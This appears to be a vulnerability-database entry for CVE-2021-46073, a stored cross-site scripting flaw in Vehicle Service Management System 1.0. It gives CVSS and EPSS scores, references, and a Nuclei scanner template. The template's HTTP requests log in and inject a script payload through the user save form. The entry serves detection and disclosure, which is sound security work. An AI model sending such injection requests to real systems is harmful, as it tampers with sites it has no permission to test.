3.5 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
4.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
44.4%
Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel.
id: CVE-2021-46073
info:
name: Vehicle Service Management System 1.0 - Cross Site Scripting
author: TenBird
severity: medium
description: |
Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS
- https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-46073
- https://github.com/SYRTI/POC_to_review
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2021-46073
cwe-id: CWE-79
epss-score: 0.0011
epss-percentile: 0.4404
cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: vehicle_service_management_system_project
product: vehicle_service_management_system
tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project
http:
- raw:
- |
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{username}}&password={{password}}
- |
POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
- |
GET /vehicle_service/admin/?page=user/list HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(header_3, 'text/html')"
- "status_code_3 == 200"
- 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
condition: and
# digest: 4b0a00483046022100a96d3af0aac3b22cd69738643941944444daba57a4d989ce5bad7797f69df3bd022100d25c9a88345d256148db9c2175d9f6a21773358cac529a6971408ffd89bd2bfd:922c64590222798bb761d5b6d8e72950
github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS
github.com/SYRTI/POC_to_review
nvd.nist.gov/vuln/detail/CVE-2021-46073
www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss
www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
3.5 Low
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
4.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
44.4%